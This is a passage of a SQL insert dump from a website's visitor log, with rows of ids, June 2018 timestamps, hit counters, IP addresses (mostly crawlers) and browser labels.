245','other'),(257407,1528571958,1,1,0,0,'54.36.149.46','other'),(257408,1528572121,1,1,0,0,'54.36.149.106','other'),(257409,1528572250,1,1,0,0,'54.36.148.19','other'),(257410,1528572421,1,1,0,0,'54.36.149.9','other'),(257411,1528572540,1,1,0,0,'54.36.148.103','other'),(257412,1528572582,1,1,0,0,'128.72.81.25','chrome'),(257413,1528572721,1,1,0,0,'54.36.148.20','other'),(257414,1528572738,1,1,0,0,'54.36.148.72','other'),(257415,1528573214,1,1,0,0,'8.29.198.25','other'),(257416,1528573272,1,1,0,0,'54.36.149.93','other'),(257417,1528573574,1,1,0,0,'54.36.148.96','other'),(257418,1528574213,1,1,0,0,'54.36.149.45','other'),(257419,1528574299,1,1,0,0,'54.36.149.34','other'),(257420,1528574508,1,1,0,0,'95.163.255.97','other'),(257421,1528574689,1,1,0,0,'54.36.148.216','other'),(257422,1528574786,1,1,0,0,'54.36.148.29','other'),(257423,1528575278,1,1,0,0,'54.36.149.92','other'),(257424,1528575280,1,1,0,0,'193.106.30.99','firefox'),(257425,1528575321,1,1,0,0,'54.36.148.163','other'),(257426,1528575397,1,1,0,0,'54.36.148.239','other'),(257427,1528575437,1,1,0,0,'216.244.66.241','other'),(257428,1528575530,1,1,0,0,'184.173.238.173','msie'),(257429,1528575559,1,1,0,0,'54.36.148.69','other'),(257430,1528575642,1,1,0,0,'54.36.149.74','other'),(257431,1528575726,1,1,0,0,'54.36.149.69','other'),(257432,1528575809,2,0,2,0,'66.249.66.155',''),(257433,1528575820,1,1,0,0,'54.36.149.89','other'),(257434,1528576077,1,1,0,0,'54.36.148.139','other'),(257435,1528576118,1,1,0,0,'54.36.148.157','other'),(257436,1528576129,1,1,0,0,'54.36.149.6','other'),(257437,1528576307,1,1,0,0,'54.36.148.48','other'),(257438,1528576582,1,1,0,0,'141.8.142.74','other'),(257439,1528576644,1,1,0,0,'54.36.148.180','other'),(257440,1528576793,1,1,0,0,'54.36.148.247','other'),(257441,1528576813,1,1,0,0,'54.36.148.97','other'),(257442,1528576825,1,1,0,0,'54.36.148.30','other'),(257443,1528577574,1,1,0,0,'54.36.148.118','other'),(257444,1528577705,2,2,0,0,'95.132.24.112','chrome'),(257445,1528577969,1,1,0,0,'54.36.148.245','other'),(257446,1528578090,2,2,0,0,'216.244.66.241','other'),(257447,1528578176,1,1,0,0,'54.36.148.227','other'),(257448,1528578221,1,1,0,0,'54.36.149.29','other'),(257449,1528578465,1,1,0,0,'8.29.198.26','other'),(257450,1528578655,1,1,0,0,'54.36.149.8','other'),(257451,1528578747,1,1,0,0,'54.36.148.143','other'),(257452,1528578827,1,1,0,0,'54.36.148.212','other'),(257453,1528578829,1,1,0,0,'54.36.149.93','other'),(257454,1528578937,1,1,0,0,'54.36.148.196','other'),(257455,1528579356,1,1,0,0,'54.36.149.81','other'),(257456,1528579748,1,1,0,0,'54.36.148.178','other'),(257457,1528579945,1,1,0,0,'54.36.148.101','other'),(257458,1528580057,1,0,1,0,'66.249.66.157',''),(257459,1528580071,1,1,0,0,'54.36.149.9','other'),(257460,1528580155,1,1,0,0,'54.36.149.14','other'),(257461,1528580764,1,1,0,0,'178.154.171.88','other'),(257462,1528580902,1,1,0,0,'54.36.148.229','other'),(257463,1528580968,1,1,0,0,'54.36.148.20','other'),(257464,1528581650,1,1,0,0,'54.36.148.70','other'),(257465,1528581832,1,1,0,0,'54.36.149.31','other'),(257466,1528581937,1,1,0,0,'54.36.148.140','other'),(257467,1528581973,1,1,0,0,'54.36.149.80','other'),(257468,1528581983,1,1,0,0,'54.36.148.142','other'),(257469,1528582154,1,1,0,0,'54.36.148.97','other'),(257470,1528582361,1,1,0,0,'54.36.148.108','other'),(257471,1528582605,1,1,0,0,'54.36.148.90','other'),(257472,1528582708,1,1,0,0,'141.8.142.74','other'),(257473,1528582774,1,1,0,0,'54.36.148.150','other'),(257474,1528582906,1,1,0,0,'54.36.149.33','other'),(257475,1528582982,1,1,0,0,'54.36.148.132','other'),(257476,1528583075,1,1,0,0,'54.36.148.167','other'),(257477,1528583187,1,1,0,0,'54.36.149.73','other'),(257478,1528583247,1,1,0,0,'54.165.59.7','other'),(257479,1528583300,1,1,0,0,'54.36.148.143','other'),(257480,1528583376,1,1,0,0,'54.36.148.207','other'),(257481,1528583431,1,1,0,0,'54.36.148.67','other'),(257482,1528583622,1,1,0,0,'141.8.142.74','other'),(257483,1528584044,1,1,0,0,'8.29.198.27','other'),(257484,1528584221,1,1,0,0,'54.36.148.248','other'),(257485,1528584229,1,1,0,0,'54.36.148.188','other'),(257486,1528584367,1,1,0,0,'54.36.148.194','other'),(257487,1528584505,1,1,0,0,'54.36.148.164','other'),(257488,1528584541,1,1,0,0,'54.36.149.49','other'),(257489,1528584612,1,1,0,0,'91.209.11.236','other'),(257490,1528584688,1,1,0,0,'54.36.148.81','other'),(257491,1528584909,1,1,0,0,'54.36.149.92','other'),(257492,1528585053,4,4,0,0,'54.165.59.7','other'),(257493,1528585258,2,2,0,0,'141.8.142.74','other'),(257494,1528585266,1,1,0,0,'54.36.148.180','other'),(257495,1528585361,1,1,0,0,'54.36.148.252','other'),(257496,1528585450,1,1,0,0,'54.36.148.96','other'),(257497,1528585603,2,2,0,0,'54.36.148.143','other'),(257498,1528585610,1,1,0,0,'54.36.148.76','other'),(257499,1528586065,1,1,0,0,'54.36.148.239','other'),(257500,1528586131,1,1,0,0,'128.75.106.91','msie'),(257501,1528586271,1,1,0,0,'54.36.148.190','other'),(257502,1528586325,1,1,0,0,'54.36.148.36','other'),(257503,1528586590,1,1,0,0,'54.36.148.114','other'),(257504,1528586634,1,1,0,0,'54.36.149.74','other'),(257505,1528586648,1,1,0,0,'54.36.148.245','other'),(257506,1528586909,1,1,0,0,'54.36.148.82','other'),(257507,1528586989,1,1,0,0,'54.36.149.14','other'),(257508,1528587192,1,1,0,0,'54.36.148.48','other'),(257509,1528587371,1,1,0,0,'54.36.148.213','other'),(257510,1528587510,1,1,0,0,'54.36.148.201','other'),(257511,1528587682,2,2,0,0,'54.36.148.42','other'),(257512,1528587706,1,1,0,0,'54.36.149.30','other'),(257513,1528587760,1,1,0,0,'54.36.149.19','other'),(257514,1528587785,2,2,0,0,'54.165.59.7','other'),(257515,1528587823,1,1,0,0,'54.36.148.74','other'),(257516,1528587911,1,1,0,0,'54.36.148.198','other'),(257517,1528588062,1,1,0,0,'54.36.148.231','other'),(257518,1528588141,1,1,0,0,'54.36.149.69','other'),(257519,1528588194,1,1,0,0,'54.36.149.102','other'),(257520,1528588286,1,1,0,0,'54.36.148.114','other'),(257521,1528588325,2,2,0,0,'216.244.66.241','other'),(257522,1528588456,1,1,0,0,'54.36.148.91','other'),(257523,1528588555,1,1,0,0,'54.36.148.169','other'),(257524,1528588765,1,1,0,0,'54.36.148.92','other'),(257525,1528588831,1,1,0,0,'54.36.149.33','other'),(257526,1528589109,1,1,0,0,'54.36.148.129','other'),(257527,1528589174,1,1,0,0,'141.8.142.74','other'),(257528,1528589178,1,1,0,0,'54.36.148.28','other'),(257529,1528589295,1,1,0,0,'8.29.198.27','other'),(257530,1528589310,1,1,0,0,'54.36.149.11','other'),(257531,1528589381,1,1,0,0,'54.36.148.149','other'),(257532,1528589538,1,1,0,0,'54.36.149.45','other'),(257533,1528589559,1,1,0,0,'54.36.149.56','other'),(257534,1528589669,1,1,0,0,'54.36.148.167','other'),(257535,1528590686,1,1,0,0,'54.36.148.223','other'),(257536,1528590728,1,1,0,0,'54.36.148.128','other'),(257537,1528590783,1,1,0,0,'54.36.149.42','other'),(257538,1528590827,1,1,0,0,'54.36.148.172','other'),(257539,1528590884,1,1,0,0,'54.36.148.89','other'),(257540,1528591093,1,0,1,0,'66.249.66.157',''),(257541,1528591119,1,1,0,0,'54.36.149.98','other'),(257542,1528591240,1,1,0,0,'141.8.142.74','other'),(257543,1528591930,1,1,0,0,'54.36.149.91','other'),(257544,1528591964,1,1,0,0,'54.36.148.50','other'),(257545,1528592191,1,1,0,0,'54.36.148.181','other'),(257546,1528592232,1,1,0,0,'178.154.171.88','other'),(257547,1528592582,1,1,0,0,'54.36.148.212','other'),(257548,1528592583,1,1,0,0,'54.36.148.141','other'),(257549,1528592593,1,1,0,0,'54.36.149.81','other'),(257550,1528592775,1,1,0,0,'54.36.149.103','other'),(257551,1528592828,1,1,0,0,'54.36.148.12','other'),(257552,1528593007,1,1,0,0,'54.36.148.63','other'),(257553,1528593391,1,1,0,0,'87.250.224.46','other'),(257554,1528593556,1,1,0,0,'54.36.148.25','other'),(257555,1528593638,1,1,0,0,'54.36.148.216','other'),(257556,1528593734,1,1,0,0,'54.36.148.20','other'),(257557,1528593793,1,1,0,0,'54.36.148.186','other'),(257558,1528593829,1,1,0,0,'54.36.148.146','other'),(257559,1528593925,1,1,0,0,'54.36.148.239','other'),(257560,1528594340,1,1,0,0,'54.36.149.11','other'),(257561,1528594437,1,1,0,0,'54.36.149.81','other'),(257562,1528594658,1,1,0,0,'54.36.148.235','other'),(257563,1528594878,1,1,0,0,'8.29.198.27','other'),(257564,1528594975,1,1,0,0,'54.36.148.234','other'),(257565,1528595151,1,1,0,0,'54.165.59.7','other'),(257566,1528595260,1,1,0,0,'54.36.148.230','other'),(257567,1528595569,1,1,0,0,'141.8.142.74','other'),(257568,1528595839,1,1,0,0,'54.36.148.35','other'),(257569,1528595841,1,1,0,0,'54.36.149.45','other'),(257570,1528596038,1,1,0,0,'54.36.149.96','other'),(257571,1528596109,1,1,0,0,'54.36.148.173','other'),(257572,1528596332,1,1,0,0,'54.36.148.110','other'),(257573,1528596432,1,1,0,0,'54.36.149.51','other'),(257574,1528596678,1,1,0,0,'141.8.142.74','other'),(257575,1528596844,1,1,0,0,'54.36.148.25','other'),(257576,1528596932,1,1,0,0,'178.154.171.88','other'),(257577,1528597125,1,0,1,0,'66.249.66.156',''),(257578,1528597142,1,1,0,0,'54.36.148.67','other'),(257579,1528597195,1,1,0,0,'54.36.149.59','other'),(257580,1528597339,1,1,0,0,'54.36.148.133','other'),(257581,1528597425,1,1,0,0,'54.36.149.53','other'),(257582,1528597439,1,1,0,0,'54.36.149.34','other'),(257583,1528597563,1,1,0,0,'54.36.149.60','other'),(257584,1528597712,2,2,0,0,'216.244.66.241','other'),(257585,1528597740,1,1,0,0,'157.55.39.233','other'),(257586,1528597805,1,1,0,0,'54.36.149.72','other'),(257587,1528598450,1,1,0,0,'51.15.205.214','chrome'),(257588,1528598576,1,1,0,0,'54.36.148.237','other'),(257589,1528598736,1,1,0,0,'46.161.9.39','chrome'),(257590,1528598779,1,0,1,0,'66.249.66.155',''),(257591,1528598944,1,1,0,0,'37.145.10.63','msie'),(257592,1528598979,1,1,0,0,'54.36.148.76','other'),(257593,1528599103,1,1,0,0,'54.36.149.70','other'),(257594,1528599261,1,1,0,0,'54.36.148.37','other'),(257595,1528599435,1,1,0,0,'54.36.148.69','other'),(257596,1528599547,1,1,0,0,'54.36.148.33','other'),(257597,1528599751,1,1,0,0,'141.8.142.74','other'),(257598,1528599804,1,1,0,0,'54.36.148.45','other'),(257599,1528599828,1,1,0,0,'54.36.148.207','other'),(257600,1528599863,1,1,0,0,'54.36.149.44','other'),(257601,1528599893,1,1,0,0,'37.9.113.182','other'),(257602,1528600063,1,1,0,0,'54.36.148.60','other'),(257603,1528600130,1,1,0,0,'8.29.198.25','other'),(257604,1528600188,1,1,0,0,'54.36.148.243','other'),(257605,1528600239,1,1,0,0,'54.36.149.82','other'),(257606,1528600279,1,0,1,0,'66.249.66.155',''),(257607,1528600282,1,1,0,0,'54.36.149.25','other'),(257608,1528600696,1,1,0,0,'54.36.149.38','other'),(257609,1528600709,1,1,0,0,'54.36.148.233','other'),(257610,1528600730,1,1,0,0,'54.36.149.74','other'),(257611,1528600943,1,1,0,0,'54.36.148.142','other'),(257612,1528601349,1,1,0,0,'54.36.148.193','other'),(257613,1528601413,1,1,0,0,'54.36.148.249','other'),(257614,1528601601,1,1,0,0,'54.36.148.212','other'),(257615,1528601632,1,1,0,0,'54.36.148.51','other'),(257616,1528601709,1,1,0,0,'54.36.148.151','other'),(257617,1528601750,1,1,0,0,'178.154.171.88','other'),(257618,1528601916,1,1,0,0,'54.36.148.103','other'),(257619,1528602378,1,1,0,0,'54.36.148.218','other'),(257620,1528602402,1,1,0,0,'95.163.255.95','other'),(257621,1528602467,1,1,0,0,'54.36.148.176','other'),(257622,1528602530,1,1,0,0,'54.36.148.52','other'),(257623,1528602680,1,1,0,0,'54.36.149.3','other'),(257624,1528602754,1,1,0,0,'54.36.149.76','other'),(257625,1528602781,1,1,0,0,'54.36.148.53','other'),(257626,1528602887,1,1,0,0,'54.36.148.12','other'),(257627,1528603158,1,1,0,0,'66.249.66.76','chrome'),(257628,1528603362,1,1,0,0,'54.36.148.149','other'),(257629,1528603448,1,1,0,0,'91.196.178.135','firefox'),(257630,1528603603,1,1,0,0,'54.36.148.65','other'),(257631,1528603791,1,1,0,0,'178.154.171.88','other'),(257632,1528604235,1,1,0,0,'54.36.148.91','other'),(257633,1528604248,7,7,0,0,'5.9.154.69','other'),(257634,1528604269,1,1,0,0,'54.36.148.202','other'),(257635,1528604499,1,1,0,0,'54.36.148.14','other'),(257636,1528604860,1,1,0,0,'54.36.149.7','other'),(257637,1528605194,1,1,0,0,'54.36.148.113','other'),(257638,1528605421,1,1,0,0,'54.36.148.160','other'),(257639,1528605630,1,1,0,0,'54.36.149.17','other'),(257640,1528605650,1,1,0,0,'54.36.149.62','other'),(257641,1528605712,1,1,0,0,'8.29.198.26','other'),(257642,1528605714,1,1,0,0,'54.36.148.108','other'),(257643,1528605872,1,1,0,0,'54.36.148.10','other'),(257644,1528606499,1,1,0,0,'54.36.148.105','other'),(257645,1528606580,1,1,0,0,'54.36.148.143','other'),(257646,1528606619,1,1,0,0,'54.36.148.27','other'),(257647,1528606756,1,1,0,0,'157.55.39.231','other'),(257648,1528607077,1,1,0,0,'54.36.148.73','other'),(257649,1528607451,1,1,0,0,'54.36.148.222','other'),(257650,1528607622,1,1,0,0,'54.36.148.29','other'),(257651,1528607708,1,1,0,0,'54.36.148.69','other'),(257652,1528607790,1,1,0,0,'54.36.149.83','other'),(257653,1528607792,1,1,0,0,'54.36.148.33','other'),(257654,1528607928,1,1,0,0,'95.163.255.98','other'),(257655,1528608035,1,1,0,0,'54.36.148.152','other'),(257656,1528608094,1,1,0,0,'54.36.148.189','other'),(257657,1528608160,1,1,0,0,'54.36.148.86','other'),(257658,1528608260,1,1,0,0,'54.36.149.6','other'),(257659,1528608377,1,1,0,0,'216.244.66.241','other'),(257660,1528608490,1,1,0,0,'54.36.148.213','other'),(257661,1528609169,1,1,0,0,'178.154.171.88','other'),(257662,1528609216,1,1,0,0,'54.36.148.180','other'),(257663,1528609380,6,6,0,0,'173.249.13.84','other'),(257664,1528609975,1,1,0,0,'54.36.149.34','other'),(257665,1528610134,1,1,0,0,'54.36.148.113','other'),(257666,1528610175,1,1,0,0,'54.36.148.112','other'),(257667,1528610372,1,1,0,0,'54.36.148.77','other'),(257668,1528610375,1,1,0,0,'54.36.148.130','other'),(257669,1528610549,1,1,0,0,'54.36.148.125','other'),(257670,1528610711,1,1,0,0,'54.36.148.243','other'),(257671,1528610937,1,1,0,0,'77.111.247.74','chrome'),(257672,1528610965,1,1,0,0,'8.29.198.26','other'),(257673,1528611133,1,1,0,0,'95.163.255.8','other'),(257674,1528611363,1,1,0,0,'54.36.148.208','other'),(257675,1528611503,1,1,0,0,'54.36.148.66','other'),(257676,1528612051,1,1,0,0,'178.154.171.88','other'),(257677,1528612165,1,1,0,0,'54.36.149.23','other'),(257678,1528612288,1,1,0,0,'54.36.148.183','other'),(257679,1528612321,1,1,0,0,'54.36.148.42','other'),(257680,1528612522,1,1,0,0,'54.36.148.77','other'),(257681,1528612541,1,1,0,0,'37.55.70.237','chrome'),(257682,1528612622,1,1,0,0,'54.36.148.31','other'),(257683,1528612951,2,2,0,0,'54.36.149.66','other'),(257684,1528613118,1,1,0,0,'54.36.148.185','other'),(257685,1528613253,1,1,0,0,'54.36.148.124','other'),(257686,1528613431,1,1,0,0,'54.36.149.13','other'),(257687,1528613496,1,1,0,0,'54.36.148.182','other'),(257688,1528613728,1,1,0,0,'54.36.149.38','other'),(257689,1528613824,2,2,0,0,'54.36.148.127','other'),(257690,1528613939,1,1,0,0,'54.36.149.1','other'),(257691,1528613972,1,1,0,0,'54.36.148.87','other'),(257692,1528614012,1,1,0,0,'54.36.148.201','other'),(257693,1528614092,1,1,0,0,'54.36.148.84','other'),(257694,1528614100,1,1,0,0,'54.36.148.98','other'),(257695,1528614106,1,1,0,0,'54.36.149.103','other'),(257696,1528614136,1,1,0,0,'54.36.148.206','other'),(257697,1528614423,1,1,0,0,'54.36.149.41','other'),(257698,1528614565,1,1,0,0,'54.36.149.58','other'),(257699,1528614568,1,1,0,0,'54.36.149.77','other'),(257700,1528614750,1,1,0,0,'54.36.148.105','other'),(257701,1528615042,1,1,0,0,'54.36.148.115','other'),(257702,1528615380,1,1,0,0,'95.132.49.245','chrome'),(257703,1528615500,1,1,0,0,'54.36.149.2','other'),(257704,1528615728,1,1,0,0,'54.36.148.89','other'),(257705,1528615824,1,1,0,0,'178.154.171.88','other'),(257706,1528615909,1,1,0,0,'54.36.148.199','other'),(257707,1528615969,1,1,0,0,'54.36.149.18','other'),(257708,1528616514,1,1,0,0,'157.55.39.192','other'),(257709,1528616538,1,1,0,0,'8.29.198.25','other'),(257710,1528616705,1,1,0,0,'54.36.149.70','other'),(257711,1528616855,1,1,0,0,'54.36.148.249','other'),(257712,1528617165,2,2,0,0,'54.36.149.20','other'),(257713,1528617461,1,1,0,0,'91.210.146.232','chrome'),(257714,1528617543,1,0,1,0,'66.249.66.155',''),(257715,1528617558,1,1,0,0,'54.36.148.16','other'),(257716,1528617571,1,1,0,0,'54.36.148.199','other'),(257717,1528617592,1,1,0,0,'54.36.148.104','other'),(257718,1528617659,1,1,0,0,'54.36.148.122','other'),(257719,1528617694,1,1,0,0,'54.36.148.69','other'),(257720,1528617772,1,1,0,0,'54.36.149.68','other'),(257721,1528618055,1,1,0,0,'54.36.148.252','other'),(257722,1528618397,1,1,0,0,'54.36.149.56','other'),(257723,1528618398,1,1,0,0,'54.36.148.170','other'),(257724,1528618885,1,1,0,0,'54.36.149.104','other'),(257725,1528619242,1,1,0,0,'95.163.255.93','other'),(257726,1528620462,1,1,0,0,'54.36.148.55','other'),(257727,1528620689,1,1,0,0,'54.36.148.13','other'),(257728,1528620761,1,1,0,0,'54.36.149.70','other'),(257729,1528620779,1,1,0,0,'157.55.39.231','other'),(257730,1528620826,1,1,0,0,'54.36.148.223','other'),(257731,1528620946,1,1,0,0,'54.36.148.170','other'),(257732,1528621012,1,1,0,0,'157.55.39.233','other'),(257733,1528621102,1,1,0,0,'54.36.148.87','other'),(257734,1528621358,1,1,0,0,'54.36.149.62','other'),(257735,1528621499,1,1,0,0,'54.36.148.105','other'),(257736,1528621533,1,1,0,0,'54.36.149.80','other'),(257737,1528621795,1,1,0,0,'8.29.198.25','other'),(257738,1528622543,1,1,0,0,'141.8.142.74','other'),(257739,1528622582,1,1,0,0,'54.36.148.85','other'),(257740,1528622796,1,1,0,0,'54.36.149.82','other'),(257741,1528623365,1,1,0,0,'54.36.149.19','other'),(257742,1528623584,1,1,0,0,'54.36.149.87','other'),(257743,1528623641,1,1,0,0,'54.36.148.166','other'),(257744,1528623756,2,2,0,0,'207.46.13.229','other'),(257745,1528623911,1,1,0,0,'54.36.148.169','other'),(257746,1528624270,1,1,0,0,'54.36.148.225','other'),(257747,1528624336,1,1,0,0,'54.36.149.53','other'),(257748,1528624470,1,1,0,0,'54.36.149.94','other'),(257749,1528624700,1,1,0,0,'95.163.255.97','other'),(257750,1528624834,1,1,0,0,'54.36.148.79','other'),(257751,1528624859,1,1,0,0,'54.36.148.62','other'),(257752,1528624902,1,1,0,0,'46.188.24.250','msie'),(257753,1528625015,1,1,0,0,'54.36.148.134','other'),(257754,1528625064,1,1,0,0,'54.36.148.195','other'),(257755,1528625376,1,1,0,0,'54.36.149.26','other'),(257756,1528625411,1,1,0,0,'54.36.149.9','other'),(257757,1528625781,1,1,0,0,'54.36.149.80','other'),(257758,1528625958,1,1,0,0,'54.36.148.138','other'),(257759,1528626014,1,1,0,0,'54.36.148.179','other'),(257760,1528626061,1,1,0,0,'54.165.59.7','other'),(257761,1528626140,1,1,0,0,'54.36.148.188','other'),(257762,1528626154,1,1,0,0,'54.36.148.148','other'),(257763,1528626438,1,0,1,0,'66.249.66.155',''),(257764,1528626524,1,1,0,0,'54.36.149.35','other'),(257765,1528627099,1,1,0,0,'54.36.149.77','other'),(257766,1528627149,1,1,0,0,'54.36.148.144','other'),(257767,1528627372,1,1,0,0,'8.29.198.26','other'),(257768,1528627438,1,1,0,0,'54.36.149.30','other'),(257769,1528627471,1,1,0,0,'54.36.149.49','other'),(257770,1528627597,1,1,0,0,'54.36.148.192','other'),(257771,1528627905,1,1,0,0,'54.36.148.24','other'),(257772,1528627960,1,1,0,0,'162.210.196.100','other'),(257773,1528628327,1,1,0,0,'54.36.148.122','other'),(257774,1528628388,1,1,0,0,'54.36.149.63','other'),(257775,1528628826,1,1,0,0,'54.36.148.19','other'),(257776,1528628919,1,1,0,0,'54.36.148.12','other'),(257777,1528629133,1,1,0,0,'54.36.149.49','other'),(257778,1528629151,1,1,0,0,'216.244.66.241','other'),(257779,1528629316,1,1,0,0,'54.36.148.151','other'),(257780,1528629919,1,1,0,0,'54.36.148.120','other'),(257781,1528630354,2,2,0,0,'54.36.148.12','other'),(257782,1528630772,1,1,0,0,'54.36.148.193','other'),(257783,1528630788,1,1,0,0,'54.36.148.223','other'),(257784,1528630873,1,1,0,0,'54.36.148.117','other'),(257785,1528631097,1,1,0,0,'54.36.149.38','other'),(257786,1528631646,1,1,0,0,'54.36.148.148','other'),(257787,1528631677,1,1,0,0,'54.36.148.32','other'),(257788,1528631727,1,1,0,0,'54.36.149.31','other'),(257789,1528631954,1,1,0,0,'54.36.148.74','other'),(257790,1528632089,1,1,0,0,'54.36.148.99','other'),(257792,1528632131,1,1,0,0,'54.36.148.164','other'),(257793,1528632172,1,1,0,0,'54.36.148.23','other'),(257794,1528632637,1,1,0,0,'8.29.198.26','other'),(257795,1528632661,1,1,0,0,'54.36.148.96','other'),(257796,1528633012,2,2,0,0,'216.244.66.241','other'),(257797,1528633082,1,1,0,0,'54.36.148.16','other'),(257798,1528633284,1,1,0,0,'54.36.148.206','other'),(257799,1528633468,1,1,0,0,'54.36.149.13','other'),(257800,1528633512,1,1,0,0,'54.36.148.158','other'),(257801,1528633594,1,1,0,0,'141.8.142.74','other'),(257802,1528633740,1,0,1,0,'66.249.66.76',''),(257803,1528633865,23,23,0,0,'142.44.159.96','other'),(257804,1528634367,1,1,0,0,'54.36.148.214','other'),(257805,1528634375,1,1,0,0,'54.36.149.80','other'),(257806,1528634414,1,1,0,0,'216.244.66.241','other'),(257807,1528634480,1,1,0,0,'54.36.148.191','other'),(257808,1528634518,1,1,0,0,'54.36.148.196','other'),(257809,1528634548,1,1,0,0,'54.36.148.94','other'),(257810,1528634570,1,1,0,0,'54.36.148.179','other'),(257811,1528634658,1,1,0,0,'54.36.148.209','other'),(257812,1528634671,1,1,0,0,'54.36.148.118','other'),(257813,1528634728,1,1,0,0,'95.163.255.102','other'),(257814,1528634739,1,1,0,0,'95.163.255.114','other'),(257815,1528634972,1,1,0,0,'54.36.148.68','other'),(257816,1528635049,1,1,0,0,'54.36.148.228','other'),(257817,1528635279,1,1,0,0,'54.36.149.97','other'),(257818,1528635723,1,1,0,0,'54.36.148.219','other'),(257819,1528635807,1,1,0,0,'54.36.148.17','other'),(257820,1528635974,1,1,0,0,'54.36.148.241','other'),(257821,1528635985,1,1,0,0,'66.249.66.155','chrome'),(257822,1528636038,1,1,0,0,'54.36.148.207','other'),(257823,1528636204,1,1,0,0,'54.36.149.83','other'),(257824,1528636374,1,1,0,0,'54.36.149.19','other'),(257825,1528636552,1,1,0,0,'54.36.149.81','other'),(257826,1528636656,1,1,0,0,'180.76.15.146','other'),(257827,1528636665,1,1,0,0,'54.36.148.250','other'),(257828,1528636762,1,1,0,0,'54.36.148.98','other'),(257829,1528637148,1,1,0,0,'54.36.149.29','other'),(257830,1528637234,1,1,0,0,'54.36.149.102','other'),(257831,1528637317,1,1,0,0,'54.36.148.210','other'),(257832,1528637754,1,0,1,0,'66.249.66.75',''),(257833,1528637757,1,1,0,0,'54.36.148.27','other'),(257834,1528637954,1,1,0,0,'207.46.13.229','other'),(257835,1528638046,1,1,0,0,'141.8.142.74','other'),(257836,1528638123,1,1,0,0,'54.36.148.220','other'),(257837,1528638145,1,0,1,0,'66.249.66.155',''),(257838,1528638200,1,1,0,0,'8.29.198.25','other'),(257839,1528638251,1,1,0,0,'54.36.149.84','other'),(257840,1528638299,1,1,0,0,'54.36.149.48','other'),(257841,1528638480,1,1,0,0,'54.36.148.124','other'),(257842,1528638545,1,1,0,0,'54.36.148.241','other'),(257843,1528638602,1,1,0,0,'54.36.148.252','other'),(257844,1528638805,1,1,0,0,'54.36.148.207','other'),(257845,1528638984,1,1,0,0,'54.36.148.211','other'),(257846,1528639254,1,0,1,0,'66.249.66.155',''),(257847,1528639583,1,1,0,0,'54.36.148.100','other'),(257848,1528639682,1,1,0,0,'54.36.149.65','other'),(257849,1528639684,1,1,0,0,'54.36.149.26','other'),(257850,1528639982,1,1,0,0,'54.36.148.141','other'),(257851,1528640180,1,1,0,0,'54.36.148.47','other'),(257852,1528640319,1,1,0,0,'54.36.149.102','other'),(257853,1528640409,1,1,0,0,'37.9.113.157','other'),(257854,1528640639,1,1,0,0,'54.36.148.27','other'),(257855,1528641239,1,1,0,0,'47.106.149.44','other'),(257856,1528641314,1,1,0,0,'54.36.148.24','other'),(257857,1528641319,1,1,0,0,'54.36.148.80','other'),(257858,1528641472,1,1,0,0,'54.36.148.255','other'),(257859,1528641513,1,1,0,0,'54.36.148.131','other'),(257860,1528641631,1,1,0,0,'54.36.148.101','other'),(257861,1528641699,1,1,0,0,'54.36.148.163','other'),(257862,1528641714,1,1,0,0,'54.36.149.65','other'),(257863,1528641849,1,1,0,0,'54.36.148.168','other'),(257864,1528642067,1,1,0,0,'54.36.148.114','other'),(257865,1528642230,1,1,0,0,'54.36.149.44','other'),(257866,1528642553,1,1,0,0,'54.36.148.40','other'),(257867,1528642772,1,1,0,0,'54.36.149.73','other'),(257868,1528642915,1,1,0,0,'54.36.148.201','other'),(257869,1528643088,1,1,0,0,'54.36.149.91','other'),(257870,1528643268,1,1,0,0,'54.36.148.82','other'),(257871,1528643359,1,1,0,0,'54.36.149.42','other'),(257872,1528643470,1,1,0,0,'8.29.198.27','other'),(257873,1528643512,1,1,0,0,'54.36.148.29','other'),(257874,1528644176,1,1,0,0,'54.36.148.171','other'),(257875,1528644548,1,1,0,0,'54.36.148.165','other'),(257876,1528644577,1,1,0,0,'54.36.148.210','other'),(257877,1528644727,1,1,0,0,'54.36.148.169','other'),(257878,1528644729,1,1,0,0,'54.36.148.39','other'),(257879,1528644748,1,1,0,0,'54.36.149.102','other'),(257880,1528644998,1,1,0,0,'54.36.149.58','other'),(257881,1528645009,1,1,0,0,'141.8.142.74','other'),(257882,1528645076,1,1,0,0,'54.36.148.81','other'),(257883,1528645180,2,2,0,0,'54.36.148.145','other'),(257884,1528645509,1,1,0,0,'80.82.70.116','chrome'),(257885,1528645833,1,1,0,0,'66.249.66.156','chrome'),(257886,1528645845,1,1,0,0,'54.36.148.135','other'),(257887,1528645999,1,1,0,0,'185.11.31.200','chrome'),(257888,1528646040,1,1,0,0,'46.211.97.235','chrome'),(257889,1528646059,1,1,0,0,'157.55.39.192','other'),(257890,1528646224,1,1,0,0,'54.36.149.12','other'),(257891,1528646331,1,1,0,0,'54.36.149.60','other'),(257892,1528646392,1,1,0,0,'54.36.149.26','other'),(257893,1528646394,1,0,1,0,'66.249.66.155',''),(257894,1528646446,1,0,1,0,'66.249.66.157',''),(257895,1528646524,1,1,0,0,'54.36.148.181','other'),(257896,1528646709,1,1,0,0,'54.36.148.246','other'),(257897,1528646736,1,1,0,0,'91.196.178.132','chrome'),(257898,1528646789,1,1,0,0,'95.163.255.92','other'),(257899,1528647495,1,1,0,0,'54.36.148.242','other'),(257900,1528647514,1,1,0,0,'54.36.148.86','other'),(257901,1528647523,1,1,0,0,'157.55.39.233','other'),(257902,1528647710,1,1,0,0,'54.36.148.85','other'),(257903,1528647793,1,1,0,0,'54.36.148.169','other'),(257904,1528648095,1,1,0,0,'54.36.148.63','other'),(257905,1528648426,1,0,1,0,'66.249.66.76',''),(257906,1528648670,1,1,0,0,'54.36.149.44','other'),(257907,1528648764,1,1,0,0,'54.36.149.91','other'),(257908,1528648788,1,1,0,0,'54.36.148.210','other'),(257909,1528649027,1,1,0,0,'8.29.198.27','other'),(257910,1528649046,1,1,0,0,'54.36.148.227','other'),(257911,1528649082,1,1,0,0,'54.36.148.235','other'),(257912,1528649137,1,1,0,0,'54.36.148.228','other'),(257913,1528649161,1,1,0,0,'54.36.149.79','other'),(257914,1528649312,1,1,0,0,'54.36.148.47','other'),(257915,1528649462,1,1,0,0,'5.3.157.109','msie'),(257916,1528649592,1,1,0,0,'46.211.127.63','chrome'),(257917,1528649655,1,1,0,0,'54.36.148.26','other'),(257918,1528649716,1,1,0,0,'54.36.148.50','other'),(257919,1528649871,1,1,0,0,'216.244.66.241','other'),(257920,1528649988,2,2,0,0,'54.36.149.6','other'),(257921,1528650107,1,0,1,0,'66.249.66.156',''),(257922,1528650129,1,1,0,0,'54.36.148.116','other'),(257923,1528650189,1,1,0,0,'54.36.149.98','other'),(257924,15286